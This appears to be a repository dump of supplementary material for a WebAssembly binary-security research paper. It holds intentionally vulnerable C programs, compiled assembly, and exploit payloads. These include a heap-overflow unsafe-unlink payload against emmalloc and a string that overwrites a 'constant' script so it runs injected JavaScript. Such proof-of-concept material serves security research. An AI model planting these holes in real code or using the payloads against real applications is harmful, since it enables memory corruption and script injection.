├── README.md
├── attack-primitives
    ├── emmalloc-unsafe-unlinking
    │   ├── out
    │   │   ├── unsafe-unlink.html
    │   │   ├── unsafe-unlink.js
    │   │   ├── unsafe-unlink.wasm
    │   │   ├── unsafe-unlink.wasm.objdump
    │   │   ├── unsafe-unlink.wasm.s
    │   │   └── unsafe-unlink.wasm.wat
    │   └── unsafe-unlink.c
    ├── global-const-write-eval
    │   ├── build.sh
    │   ├── out
    │   │   ├── run_script.html
    │   │   ├── run_script.js
    │   │   ├── run_script.native
    │   │   ├── run_script.native.objdump
    │   │   ├── run_script.native.s
    │   │   ├── run_script.wasm
    │   │   ├── run_script.wasm.objdump
    │   │   ├── run_script.wasm.s
    │   │   └── run_script.wasm.wat
    │   └── run_script.c
    ├── server.py
    ├── stack-buffer-overflow-data-only
    │   ├── out
    │   │   ├── same-frame-force-order.html
    │   │   ├── same-frame-force-order.js
    │   │   ├── same-frame-force-order.native
    │   │   ├── same-frame-force-order.native.objdump
    │   │   ├── same-frame-force-order.native.s
    │   │   ├── same-frame-force-order.wasm
    │   │   ├── same-frame-force-order.wasm.map
    │   │   ├── same-frame-force-order.wasm.objdump
    │   │   ├── same-frame-force-order.wasm.s
    │   │   ├── same-frame-force-order.wasm.wat
    │   │   ├── same-frame.html
    │   │   ├── same-frame.js
    │   │   ├── same-frame.native
    │   │   ├── same-frame.native.objdump
    │   │   ├── same-frame.native.s
    │   │   ├── same-frame.wasm
    │   │   ├── same-frame.wasm.map
    │   │   ├── same-frame.wasm.objdump
    │   │   ├── same-frame.wasm.s
    │   │   └── same-frame.wasm.wat
    │   └── same-frame.c
    └── stack-buffer-overflow
    │   ├── main.c
    │   └── out
    │       ├── main.html
    │       ├── main.js
    │       ├── main.native
    │       ├── main.native.objdump
    │       ├── main.native.s
    │       ├── main.wasm
    │       ├── main.wasm.map
    │       ├── main.wasm.objdump
    │       ├── main.wasm.s
    │       └── main.wasm.wat
├── compilers
    ├── get-versions.sh
    └── versions.txt
├── end-to-end-exploits
    ├── browser-libpng-xss
    │   ├── 00-compile-libpng-native
    │   │   ├── .gitignore
    │   │   └── libpng-1.6.35.zip
    │   ├── 01-reproduce-overflow-native-detected
    │   │   ├── input-ssp-detected
    │   │   ├── input-too-large-segfault
    │   │   └── pnm2png
    │   ├── 02-compile-pnm2png-wasm
    │   │   ├── .gitignore
    │   │   ├── build.sh
    │   │   ├── inputs
    │   │   │   ├── crash
    │   │   │   ├── exploit
    │   │   │   ├── monarch.png
    │   │   │   ├── monarch.pnm
    │   │   │   └── small.ppm
    │   │   ├── main.cpp
    │   │   ├── out
    │   │   │   ├── main.html
    │   │   │   ├── main.js
    │   │   │   └── main.wasm
    │   │   ├── screenshots
    │   │   │   ├── before.png
    │   │   │   ├── benign.png
    │   │   │   └── exploit.png
    │   │   ├── server.py
    │   │   └── simplified.cpp
    │   ├── CVE-2018-14550
    │   └── valid-input.pbm
    ├── node-js-rce
    │   ├── build.sh
    │   ├── exploit
    │   ├── gksudo-offset
    │   ├── main.c
    │   ├── main.js
    │   ├── main.wasm
    │   └── main.wat
    └── wasmtime-constant-file
    │   ├── build.sh
    │   ├── danger
    │   ├── exploit.txt
    │   ├── file.txt
    │   ├── vuln.c
    │   ├── vuln.native
    │   ├── vuln.s
    │   ├── vuln.wasm
    │   ├── vuln.wasm.objdump
    │   └── vuln.wasm.wat
├── linear-memory-analysis
    ├── build.sh
    ├── clang-stack-first-wasi.wasm
    ├── clang-stack-first-wasi.wasm.objdump
    ├── clang-stack-first-wasi.wasm.stdout
    ├── clang-stack-first-wasi.wasm.wat
    ├── clang-wasi-stack-first.wasm
    ├── clang-wasi-stack-first.wasm.objdump
    ├── clang-wasi-stack-first.wasm.wat
    ├── clang-wasi.wasm
    ├── clang-wasi.wasm.objdump
    ├── clang-wasi.wasm.stdout
    ├── clang-wasi.wasm.wat
    ├── emcc-fastcomp.js
    ├── emcc-fastcomp.js.stdout
    ├── emcc-fastcomp.wasm
    ├── emcc-fastcomp.wasm.objdump
    ├── emcc-fastcomp.wasm.wat
    ├── emcc-upstream.js
    ├── emcc-upstream.js.stdout
    ├── emcc-upstream.wasm
    ├── emcc-upstream.wasm.objdump
    ├── emcc-upstream.wasm.wat
    ├── main.c
    ├── main.rs
    ├── rust-wasi.wasm
    ├── rust-wasi.wasm.objdump
    ├── rust-wasi.wasm.stdout
    └── rust-wasi.wasm.wat
├── quantitative-evaluation
    ├── overview-table.csv
    ├── raw-tool-output
    │   ├── real-world
    │   │   ├── 1password.wasm.txt
    │   │   ├── acrobat.wasm.txt
    │   │   ├── doom3.wasm.txt
    │   │   ├── figma.wasm.txt
    │   │   └── squoosh-imagecodecs
    │   │   │   ├── hqx-rs-8c087e0290bb39f1e090.module.wasm.txt
    │   │   │   ├── mozjpeg_enc.93395.wasm.txt
    │   │   │   ├── optipng.4e77b.wasm.txt
    │   │   │   ├── webp_dec.fa0ab.wasm.txt
    │   │   │   └── webp_enc.ea665.wasm.txt
    │   └── spec-cpu
    │   │   ├── fastcomp
    │   │       ├── blender_r.wasm.security-analysis.txt
    │   │       ├── cpugcc_r.wasm.security-analysis.txt
    │   │       ├── cpuxalan_r.wasm.security-analysis.txt
    │   │       ├── deepsjeng_r.wasm.security-analysis.txt
    │   │       ├── imagick_r.wasm.security-analysis.txt
    │   │       ├── lbm_r.wasm.security-analysis.txt
    │   │       ├── ldecod_r.wasm.security-analysis.txt
    │   │       ├── leela_r.wasm.security-analysis.txt
    │   │       ├── mcf_r.wasm.security-analysis.txt
    │   │       ├── nab_r.wasm.security-analysis.txt
    │   │       ├── namd_r.wasm.security-analysis.txt
    │   │       ├── omnetpp_r.wasm.security-analysis.txt
    │   │       ├── parest_r.wasm.security-analysis.txt
    │   │       ├── perlbench_r.wasm.security-analysis.txt
    │   │       ├── povray_r.wasm.security-analysis.txt
    │   │       ├── x264_r.wasm.security-analysis.txt
    │   │       └── xz_r.wasm.security-analysis.txt
    │   │   └── upstream
    │   │       ├── blender_r.wasm.security-analysis.txt
    │   │       ├── cpugcc_r.wasm.security-analysis.txt
    │   │       ├── cpuxalan_r.wasm.security-analysis.txt
    │   │       ├── deepsjeng_r.wasm.security-analysis.txt
    │   │       ├── imagick_r.wasm.security-analysis.txt
    │   │       ├── lbm_r.wasm.security-analysis.txt
    │   │       ├── ldecod_r.wasm.security-analysis.txt
    │   │       ├── leela_r.wasm.security-analysis.txt
    │   │       ├── mcf_r.wasm.security-analysis.txt
    │   │       ├── nab_r.wasm.security-analysis.txt
    │   │       ├── namd_r.wasm.security-analysis.txt
    │   │       ├── omnetpp_r.wasm.security-analysis.txt
    │   │       ├── parest_r.wasm.security-analysis.txt
    │   │       ├── perlbench_r.wasm.security-analysis.txt
    │   │       ├── povray_r.wasm.security-analysis.txt
    │   │       ├── x264_r.wasm.security-analysis.txt
    │   │       └── xz_r.wasm.security-analysis.txt
    ├── spec-cpu-cfi-classes
    │   ├── fastcomp.csv
    │   └── upstream.csv
    ├── spec-cpu-compile-configs
    │   ├── emcc-fastcomp.cfg
    │   └── emcc-upstream.cfg
    ├── unmanaged-stack-usage-sum.csv
    └── unmanaged-stack-usage.csv
└── tool
    └── wasm-security-analysis
        ├── .gitignore
        ├── Cargo.lock
        ├── Cargo.toml
        ├── README.md
        └── src
            └── main.rs


/README.md:
--------------------------------------------------------------------------------
1 | # Supplementary Material for USENIX Security 2020 Paper: "Everything Old is New Again: Binary Security of WebAssembly"
2 | 
3 | - `tool/`: Rust source code of the static analysis tool to obtain unmanaged stack usage and CFI equivalence classes from a WebAssembly binary. See the project README for a bit more high-level information.
4 | - `compilers/`: Versions of the C, C++, and Rust compilers used in proof-of-concept exploits and analyzing linear memory layout of WebAssembly binaries.
5 | - `linear-memory-analysis/`: C and Rust programs, build scripts, and resulting binaries to analyze the memory layout when compiling with different compilers. Corresponding to section 3 in the paper.
6 | - `attack-primitives/`: Stack-based buffer overflow, heap overflow (on emmalloc), and global "constant" overwrite primitive examples (C source code and produced, vulnerable binaries). Corresponding to section 4 in the paper.
7 | - `end-to-end-exploits/`: Example applications on three different WebAssembly platforms (browser, Node.js, wasmtime) and end-to-end exploits against those proof-of-concept applications. Corresponding to section 5 in the paper.
8 | - `quantitative-evaluation/`: Raw data for the quantitative evaluation on unmanaged stack usage and CFI equivalence classes in real-world and SPEC CPU binaries. Corresponding to section 6 in the paper.
9 | 


--------------------------------------------------------------------------------
/attack-primitives/emmalloc-unsafe-unlinking/out/unsafe-unlink.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/emmalloc-unsafe-unlinking/out/unsafe-unlink.wasm


--------------------------------------------------------------------------------
/attack-primitives/emmalloc-unsafe-unlinking/unsafe-unlink.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <string.h>
  3 | #include <stdio.h>
  4 | #include <inttypes.h> // uintptr_t
  5 | #include <emscripten.h>
  6 | 
  7 | // NOTE Must compile with -s MALLOC=emmalloc, since dlmalloc 2.8.5. implements safe unlinking
  8 | 
  9 | // NOTE Must compile without -g flag with emcc in order to disable assertions (that check unlinking).
 10 | 
 11 | // NOTE For easier debugging of the allocator, you can change
 12 | // emsdk/upstream/emscripten/tools/system_libs.py, libmalloc, cflags
 13 | // to include '-fno-inline-functions', '-g'.
 14 | 
 15 | /*
 16 |  * Just some helpers for printing the heap state.
 17 |  */
 18 | 
 19 | int alignment(void * ptr) {
 20 |     int trailing_zeroes = __builtin_ctz((uintptr_t) ptr);
 21 |     return 2 << trailing_zeroes;
 22 | }
 23 | 
 24 | void print_ptr(void * ptr) {
 25 |     if (ptr) {
 26 |         printf("%p (%lu), align=%d\n", ptr, (uintptr_t) ptr, alignment(ptr));
 27 |     } else {
 28 |         printf("NULL\n");
 29 |     }
 30 | }
 31 | 
 32 | // From emmalloc.cpp:
 33 | struct free_info {
 34 |   void * prev;
 35 |   void * next;
 36 | };
 37 | 
 38 | typedef struct region {
 39 |     // Bitfield, i.e., the LSB is used, all the other bits are totalSize.
 40 |     size_t used : 1;
 41 |     size_t totalSize : 31;
 42 | 
 43 |     // Each memory area knows its previous neighbor, as we hope to merge them.
 44 |     // To compute the next neighbor we can use the total size, and to know
 45 |     // if a neighbor exists we can compare the region to lastRegion
 46 |     struct region* prev;
 47 | 
 48 |     // Up to here was the fixed metadata, of size 16. The rest is either
 49 |     // the payload, or freelist info.
 50 |     union {
 51 |         struct free_info free_info;
 52 |         // NOTE flexible array member is not supported in a union, I wonder why it works for emscripten?
 53 |         char payload[1];
 54 |     };
 55 | } region;
 56 | 
 57 | void print_heap_metadata_emmalloc(void * payload) {
 58 |     uint8_t * payload_bytes = payload;
 59 |     region* region = (struct region*) (payload_bytes - 8);
 60 |     printf("region at: ");
 61 |     print_ptr(region);
 62 |     printf("totalSize: 0x%x (%d) bytes\n", region->totalSize, region->totalSize);
 63 |     printf("state:     %s\n", (region->used) ? "used" : "free");
 64 |     printf("prev:      ");
 65 |     print_ptr(region->prev);
 66 |     printf("next():    ");
 67 |     print_ptr((char*) region + region->totalSize);
 68 |     if (region->used) {
 69 |         printf("payload at: ");
 70 |         print_ptr(&region->payload);
 71 |         printf("payload:   \"%s\"\n", region->payload);
 72 |     } else {
 73 |         printf("free_info at: ");
 74 |         print_ptr(&region->free_info);
 75 |         printf("FI.prev:   ");
 76 |         print_ptr(region->free_info.prev);
 77 |         printf("FI.next:   ");
 78 |         print_ptr(region->free_info.next);
 79 |     }
 80 |     printf("\n");
 81 | }
 82 | 
 83 | 
 84 | /*
 85 |  * Vulnerable function, exported to JS (see wrapper code below).
 86 |  */
 87 | 
 88 | __attribute__((used))
 89 | void main_bytes(void * input, size_t size) {
 90 | 
 91 |     printf("input: %s\n", (char *) input);
 92 |     printf("size:  %zu\n\n", size);
 93 | 
 94 | 
 95 |     uint8_t * alloc1 = malloc(8);
 96 |     printf("alloc1\n");
 97 |     print_heap_metadata_emmalloc(alloc1);
 98 | 
 99 |     // This is the allocation that is getting overflown into (more specifically its metadata).
100 |     // - Allocate enough space to make sure we don't run out of the global heap altogether.
101 |     // - In this case, we cannot NOT allocate it, because then alloc1 == lastRegion, which
102 |     //   prevents the allocator from merging (which is the code path, we exploit).
103 |     uint8_t * alloc2 = malloc(1000);
104 |     printf("alloc2\n");
105 |     print_heap_metadata_emmalloc(alloc2);
106 | 
107 | 
108 |     // Heap overflow.
109 |     // Corrupting metadata of alloc2:
110 |     // - Mark it as free (used := 0), such that it gets merged into alloc1 upon free.
111 |     // - Setup fake FreeInfo.prev and .next pointer for mirrored write primitive.
112 |     // See below for details.
113 |     printf("memcpy\n\n");
114 |     memcpy(alloc1, input, size);
115 | 
116 |     printf("alloc1\n");
117 |     print_heap_metadata_emmalloc(alloc1);
118 | 
119 |     printf("alloc2 (corrupted)\n");
120 |     print_heap_metadata_emmalloc(alloc2);
121 | 
122 | 
123 |     // Trigger the vulnerability by free-ing alloc1:
124 |     // - We want to manipulate alloc2 to let the allocator think it is a free region.
125 |     // - Then, it will try to merge alloc2 and alloc1.
126 |     // - For which it will remove alloc2 from the free list.
127 |     // - For which it will unlink alloc2's FreeInfo -> classic unsafe unlinking :-)
128 |     // - Call chain: free() -> stopUsing() -> mergeIntoExistingFreeRegion() -> removeFromFreeList().
129 |     printf("free alloc1\n\n");
130 |     free(alloc1);
131 | 
132 |     printf("alloc1\n");
133 |     print_heap_metadata_emmalloc(alloc1);
134 | 
135 |     printf("alloc2\n");
136 |     print_heap_metadata_emmalloc(alloc2);
137 | 
138 | }
139 | 
140 | /*
141 |  * Setup and exploit code, but vulnerability is in main_bytes().
142 |  */
143 | 
144 | int main(int argc, char ** argv) {
145 |     // Make main_bytes() available conveniently in JavaScript (just pass a JS array).
146 |     EM_ASM({
147 |         window.main_bytes = function(array) { 
148 |             ccall("main_bytes", null, ["array", "number"], [array, array.length]);
149 |         };
150 |     });
151 | 
152 |     // // Let's just exploit right here on the spot (but you could also
153 |     // // simply execute this JS in the developer console in the browser.)
154 |     // EM_ASM(main_bytes([
155 |     //     // Regular payload data for alloc1.
156 |     //     65, 65, 65, 65, 65, 65, 65, 0, 
157 |         
158 |     //     // Overwrite metadata of alloc2, which is right next to alloc1:
159 | 
160 |     //     // size + used flag:
161 |     //     // - "+ 0" means the used bit is 0 (= free region).
162 |     //     // - "16<<1" is the size, including metadata (16 bytes).
163 |     //     //   The value is not used by the exploited code in the allocator except for error checking, 
164 |     //     //   so you have to make sure two things (when compiled with assertions):
165 |     //     //   1. size - METADATA_SIZE > 0, i.e., size MUST BE > 8.
166 |     //     //   2. this + size < DYNAMIC_TOP, i.e., size should not be too large
167 |     //     (16<<1) + 0, 0, 0, 0,
168 | 
169 |     //     // Region.prev: UNUSED
170 |     //     0, 0, 0, 0,
171 | 
172 |     //     // Now the two mirrored writes, where the following happens during unlinking:
173 |     //     // *(prev+4) = next, and
174 |     //     // *(next)   = prev.
175 |     //     // I.e., both values will be used as pointers and as values (hence a "mirrored write").
176 | 
177 |     //     // Region.FreeInfo.prev:
178 |     //     0, 0x10, 0, 0, // TODO change to your liking
179 |     //     // Region.FreeInfo.next: UNUSED
180 |     //     0, 0x20, 0, 0, // TODO change to your liking
181 |     // ]));
182 |     
183 |     // To check whether exploit was successful (i.e. the writes were performed), type in JS console:
184 |     // HEAP32[0x1000+4 >> 2] == 0x2000
185 |     // HEAP32[0x2000   >> 2] == 0x1000
186 |     // both should give true.
187 |     // (The >> 2 is just because HEAP32 operates on words, i.e., 4 bytes at a time, so byte 
188 |     // addresses have to be divided by 4.)
189 | 
190 |     return 0;
191 | }
192 | 


--------------------------------------------------------------------------------
/attack-primitives/global-const-write-eval/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | input="run_script.c"
3 | basename=$(basename $input .c)
4 | mkdir -p out
5 | # use simpler allocator to save space in wasm file and make it easier to understand
6 | emcc -O2 -g4 -o "out/$basename.html" "$input" -s MALLOC="emmalloc"
7 | 


--------------------------------------------------------------------------------
/attack-primitives/global-const-write-eval/out/run_script.native:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/global-const-write-eval/out/run_script.native


--------------------------------------------------------------------------------
/attack-primitives/global-const-write-eval/out/run_script.native.s:
--------------------------------------------------------------------------------
 1 | 	.text
 2 | 	.intel_syntax noprefix
 3 | 	.file	"run_script.c"
 4 | 	.globl	main                    # -- Begin function main
 5 | 	.p2align	4, 0x90
 6 | 	.type	main,@function
 7 | main:                                   # @main
 8 | 	.cfi_startproc
 9 | # %bb.0:
10 | 	push	rax
11 | 	.cfi_def_cfa_offset 16
12 | 	mov	rdi, qword ptr [rip + other_data]
13 | 	call	puts
14 | 	mov	edi, offset .L.str.2
15 | 	call	puts
16 | 	mov	edi, offset .L.str.2
17 | 	xor	eax, eax
18 | 	call	printf
19 | 	xor	eax, eax
20 | 	pop	rcx
21 | 	ret
22 | .Lfunc_end0:
23 | 	.size	main, .Lfunc_end0-main
24 | 	.cfi_endproc
25 |                                         # -- End function
26 | 	.globl	do_something_stupid_which_allows_write_access # -- Begin function do_something_stupid_which_allows_write_access
27 | 	.p2align	4, 0x90
28 | 	.type	do_something_stupid_which_allows_write_access,@function
29 | do_something_stupid_which_allows_write_access: # @do_something_stupid_which_allows_write_access
30 | 	.cfi_startproc
31 | # %bb.0:
32 | 	push	rax
33 | 	.cfi_def_cfa_offset 16
34 | 	mov	rax, rdi
35 | 	mov	rdi, qword ptr [rip + other_data]
36 | 	mov	rsi, rax
37 | 	call	strcpy
38 | 	mov	edi, offset .L.str.1
39 | 	pop	rax
40 | 	jmp	puts                    # TAILCALL
41 | .Lfunc_end1:
42 | 	.size	do_something_stupid_which_allows_write_access, .Lfunc_end1-do_something_stupid_which_allows_write_access
43 | 	.cfi_endproc
44 |                                         # -- End function
45 | 	.type	.L.str,@object          # @.str
46 | 	.section	.rodata.str1.1,"aMS",@progbits,1
47 | .L.str:
48 | 	.asciz	"AAAA"
49 | 	.size	.L.str, 5
50 | 
51 | 	.type	other_data,@object      # @other_data
52 | 	.data
53 | 	.globl	other_data
54 | 	.p2align	3
55 | other_data:
56 | 	.quad	.L.str
57 | 	.size	other_data, 8
58 | 
59 | 	.type	.L.str.1,@object        # @.str.1
60 | 	.section	.rodata.str1.1,"aMS",@progbits,1
61 | .L.str.1:
62 | 	.asciz	"we fucked up..."
63 | 	.size	.L.str.1, 16
64 | 
65 | 	.type	.L.str.2,@object        # @.str.2
66 | .L.str.2:
67 | 	.asciz	"console.log('this should be safe, shouldn\\'t it?')"
68 | 	.size	.L.str.2, 51
69 | 
70 | 
71 | 	.ident	"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"
72 | 	.section	".note.GNU-stack","",@progbits
73 | 


--------------------------------------------------------------------------------
/attack-primitives/global-const-write-eval/out/run_script.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/global-const-write-eval/out/run_script.wasm


--------------------------------------------------------------------------------
/attack-primitives/global-const-write-eval/out/run_script.wasm.s:
--------------------------------------------------------------------------------
  1 | 	.text
  2 | 	.file	"run_script.c"
  3 | 	.section	.text.__original_main,"",@
  4 | 	.hidden	__original_main         # -- Begin function __original_main
  5 | 	.globl	__original_main
  6 | 	.type	__original_main,@function
  7 | __original_main:                        # @__original_main
  8 | 	.functype	__original_main () -> (i32)
  9 | # %bb.0:                                # %entry
 10 | 	i32.const	0
 11 | 	i32.load	other_data
 12 | 	i32.call	puts
 13 | 	drop
 14 | 	i32.const	.L.str.2
 15 | 	i32.call	puts
 16 | 	drop
 17 | 	i32.const	.L.str.2
 18 | 	call	emscripten_run_script
 19 | 	i32.const	0
 20 |                                         # fallthrough-return-value
 21 | 	end_function
 22 | .Lfunc_end0:
 23 | 	.size	__original_main, .Lfunc_end0-__original_main
 24 |                                         # -- End function
 25 | 	.section	.text.do_something_stupid_which_allows_write_access,"",@
 26 | 	.hidden	do_something_stupid_which_allows_write_access # -- Begin function do_something_stupid_which_allows_write_access
 27 | 	.globl	do_something_stupid_which_allows_write_access
 28 | 	.type	do_something_stupid_which_allows_write_access,@function
 29 | do_something_stupid_which_allows_write_access: # @do_something_stupid_which_allows_write_access
 30 | 	.functype	do_something_stupid_which_allows_write_access (i32) -> ()
 31 | # %bb.0:                                # %entry
 32 | 	i32.const	0
 33 | 	i32.load	other_data
 34 | 	local.get	0
 35 | 	i32.call	strcpy
 36 | 	drop
 37 | 	i32.const	.L.str.1
 38 | 	i32.call	puts
 39 | 	drop
 40 |                                         # fallthrough-return-void
 41 | 	end_function
 42 | .Lfunc_end1:
 43 | 	.size	do_something_stupid_which_allows_write_access, .Lfunc_end1-do_something_stupid_which_allows_write_access
 44 |                                         # -- End function
 45 | 	.section	.text.main,"",@
 46 | 	.hidden	main                    # -- Begin function main
 47 | 	.globl	main
 48 | 	.type	main,@function
 49 | main:                                   # @main
 50 | 	.functype	main (i32, i32) -> (i32)
 51 | # %bb.0:                                # %body
 52 | 	i32.call	__original_main
 53 |                                         # fallthrough-return-value
 54 | 	end_function
 55 | .Lfunc_end2:
 56 | 	.size	main, .Lfunc_end2-main
 57 |                                         # -- End function
 58 | 	.type	.L.str,@object          # @.str
 59 | 	.section	.rodata..L.str,"",@
 60 | .L.str:
 61 | 	.asciz	"AAAA"
 62 | 	.size	.L.str, 5
 63 | 
 64 | 	.hidden	other_data              # @other_data
 65 | 	.type	other_data,@object
 66 | 	.section	.data.other_data,"",@
 67 | 	.globl	other_data
 68 | 	.p2align	2
 69 | other_data:
 70 | 	.int32	.L.str
 71 | 	.size	other_data, 4
 72 | 
 73 | 	.type	.L.str.1,@object        # @.str.1
 74 | 	.section	.rodata..L.str.1,"",@
 75 | .L.str.1:
 76 | 	.asciz	"we fucked up..."
 77 | 	.size	.L.str.1, 16
 78 | 
 79 | 	.type	.L.str.2,@object        # @.str.2
 80 | 	.section	.rodata..L.str.2,"",@
 81 | .L.str.2:
 82 | 	.asciz	"console.log('this should be safe, shouldn\\'t it?')"
 83 | 	.size	.L.str.2, 51
 84 | 
 85 | 	.no_dead_strip	do_something_stupid_which_allows_write_access
 86 | 
 87 | 	.ident	"clang version 10.0.0 (/b/s/w/ir/cache/git/chromium.googlesource.com-external-github.com-llvm-llvm--project 12e915b3fcc55b8394dce3105a24c009e516d153)"
 88 | 	.functype	puts (i32) -> (i32)
 89 | 	.functype	emscripten_run_script (i32) -> ()
 90 | 	.functype	strcpy (i32, i32) -> (i32)
 91 | 	.functype	getTempRet0 () -> (i32)
 92 | 	.functype	setTempRet0 (i32) -> ()
 93 | 	.size	__THREW__, 4
 94 | 	.size	__threwValue, 4
 95 | 	.section	.custom_section.producers,"",@
 96 | 	.int8	1
 97 | 	.int8	12
 98 | 	.ascii	"processed-by"
 99 | 	.int8	1
100 | 	.int8	5
101 | 	.ascii	"clang"
102 | 	.ascii	"\206\001"
103 | 	.ascii	"10.0.0 (/b/s/w/ir/cache/git/chromium.googlesource.com-external-github.com-llvm-llvm--project 12e915b3fcc55b8394dce3105a24c009e516d153)"
104 | 	.section	.rodata..L.str.2,"",@
105 | 


--------------------------------------------------------------------------------
/attack-primitives/global-const-write-eval/run_script.c:
--------------------------------------------------------------------------------
 1 | #ifdef __EMSCRIPTEN__
 2 | #include<emscripten.h>
 3 | #else
 4 | #define EMSCRIPTEN_KEEPALIVE __attribute((used))
 5 | #define emscripten_run_script printf
 6 | #endif
 7 | 
 8 | #include<string.h>
 9 | #include<stdio.h>
10 | 
11 | char * other_data = "AAAA";
12 | 
13 | // NOTE with a const char* the code is even more unsafe, because it gets compiled as:
14 | //    i32.const 1668 (or something)
15 | //    i32.load8
16 | // instead of 
17 | //    i32.const 1024
18 | // i.e., there is one more memory indirection and a single ptr override would suffice!
19 | 
20 | // Doesn't work in native, since safe_script is put into .rodata section, which is mapped to a non-W
21 | // page. See objdump -s -j .rodata out/run_script.native.
22 | 
23 | static char * safe_script = "console.log('this should be safe, shouldn\\'t it?')";
24 | 
25 | int main() {
26 | 
27 |   puts(other_data);
28 |   puts(safe_script);
29 | 
30 |   emscripten_run_script(safe_script);
31 | 
32 |   return 0;
33 | }
34 | 
35 | // Exploit with (in JS console, but in principle C code could cause this)
36 | // ccall("do_something_stupid_which_allows_write_access", null, ["string"], [";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;alert('bam')"])
37 | // Then run again with:
38 | // _main()
39 | 
40 | EMSCRIPTEN_KEEPALIVE
41 | void do_something_stupid_which_allows_write_access(const char * input) {
42 |   // Buffer overflow happens here!
43 |   // the memory is not that static actually :P
44 |   // WASM doesnt have read-only mem!
45 |   strcpy(other_data, input);
46 |   puts("we fucked up...");
47 | }
48 | 


--------------------------------------------------------------------------------
/attack-primitives/server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | # Serve wasm with the correct MIME type
 4 | 
 5 | import SimpleHTTPServer
 6 | import SocketServer
 7 | 
 8 | PORT = 8000
 9 | 
10 | Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
11 | 
12 | Handler.extensions_map['.wasm'] = 'application/wasm'
13 | httpd = SocketServer.TCPServer(("", PORT), Handler)
14 | httpd.serve_forever()
15 | 


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame-force-order.native:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/stack-buffer-overflow-data-only/out/same-frame-force-order.native


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame-force-order.native.s:
--------------------------------------------------------------------------------
  1 | 	.text
  2 | 	.intel_syntax noprefix
  3 | 	.file	"same-frame-force-order.c"
  4 | 	.globl	print_bufs              # -- Begin function print_bufs
  5 | 	.p2align	4, 0x90
  6 | 	.type	print_bufs,@function
  7 | print_bufs:                             # @print_bufs
  8 | 	.cfi_startproc
  9 | # %bb.0:
 10 | 	push	rbx
 11 | 	.cfi_def_cfa_offset 16
 12 | 	.cfi_offset rbx, -16
 13 | 	mov	rbx, rsi
 14 | 	mov	rcx, rdi
 15 | 	mov	edi, offset .L.str
 16 | 	xor	eax, eax
 17 | 	mov	rsi, rcx
 18 | 	mov	rdx, rcx
 19 | 	call	printf
 20 | 	mov	edi, offset .L.str.1
 21 | 	xor	eax, eax
 22 | 	mov	rsi, rbx
 23 | 	mov	rdx, rbx
 24 | 	pop	rbx
 25 | 	jmp	printf                  # TAILCALL
 26 | .Lfunc_end0:
 27 | 	.size	print_bufs, .Lfunc_end0-print_bufs
 28 | 	.cfi_endproc
 29 |                                         # -- End function
 30 | 	.globl	main                    # -- Begin function main
 31 | 	.p2align	4, 0x90
 32 | 	.type	main,@function
 33 | main:                                   # @main
 34 | 	.cfi_startproc
 35 | # %bb.0:
 36 | 	push	r15
 37 | 	.cfi_def_cfa_offset 16
 38 | 	push	r14
 39 | 	.cfi_def_cfa_offset 24
 40 | 	push	rbx
 41 | 	.cfi_def_cfa_offset 32
 42 | 	sub	rsp, 32
 43 | 	.cfi_def_cfa_offset 64
 44 | 	.cfi_offset rbx, -32
 45 | 	.cfi_offset r14, -24
 46 | 	.cfi_offset r15, -16
 47 | 	mov	rbx, rsi
 48 | 	mov	rax, qword ptr fs:[40]
 49 | 	mov	qword ptr [rsp + 24], rax
 50 | 	movups	xmm0, xmmword ptr [rip + .Lmain.two_bufs]
 51 | 	movaps	xmmword ptr [rsp], xmm0
 52 | 	lea	r14, [rsp + 8]
 53 | 	mov	r15, rsp
 54 | 	mov	rdi, r15
 55 | 	mov	rsi, r14
 56 | 	call	print_bufs
 57 | 	mov	rsi, qword ptr [rbx + 8]
 58 | 	mov	rdi, r15
 59 | 	call	strcpy
 60 | 	mov	rdi, r15
 61 | 	mov	rsi, r14
 62 | 	call	print_bufs
 63 | 	mov	rax, qword ptr fs:[40]
 64 | 	cmp	rax, qword ptr [rsp + 24]
 65 | 	jne	.LBB1_2
 66 | # %bb.1:
 67 | 	xor	eax, eax
 68 | 	add	rsp, 32
 69 | 	pop	rbx
 70 | 	pop	r14
 71 | 	pop	r15
 72 | 	ret
 73 | .LBB1_2:
 74 | 	call	__stack_chk_fail
 75 | .Lfunc_end1:
 76 | 	.size	main, .Lfunc_end1-main
 77 | 	.cfi_endproc
 78 |                                         # -- End function
 79 | 	.type	.L.str,@object          # @.str
 80 | 	.section	.rodata.str1.1,"aMS",@progbits,1
 81 | .L.str:
 82 | 	.asciz	"&buf_overflow:   %p\n buf_overflow:   %s\n"
 83 | 	.size	.L.str, 41
 84 | 
 85 | 	.type	.L.str.1,@object        # @.str.1
 86 | .L.str.1:
 87 | 	.asciz	"&buf_other_data: %p\n buf_other_data: %s\n"
 88 | 	.size	.L.str.1, 41
 89 | 
 90 | 	.type	.Lmain.two_bufs,@object # @main.two_bufs
 91 | 	.section	.rodata.cst16,"aM",@progbits,16
 92 | .Lmain.two_bufs:
 93 | 	.zero	8
 94 | 	.asciz	"BBBBBBB"
 95 | 	.size	.Lmain.two_bufs, 16
 96 | 
 97 | 
 98 | 	.ident	"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"
 99 | 	.section	".note.GNU-stack","",@progbits
100 | 


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame-force-order.wasm:
--------------------------------------------------------------------------------
